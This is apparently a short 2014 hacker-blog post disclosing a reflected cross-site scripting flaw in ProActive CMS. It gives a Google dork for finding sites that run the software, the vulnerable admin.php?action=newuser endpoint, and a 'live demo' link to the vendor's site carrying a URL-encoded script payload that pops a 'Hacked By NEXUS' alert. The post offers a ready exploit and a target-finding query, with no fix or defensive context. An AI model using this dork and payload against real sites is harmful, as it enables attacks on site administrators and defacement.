Sunday, 6 July 2014

ProActive CMS - XSS

Dork:
intext:"Powered by Proactive CMS"

Exploit:
 /admin.php?action=newuser (XSS)

Live Demo:
http://www.proactivecms.com/admin.php?action=newuser%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E


NEXUS - Sharing Is Caring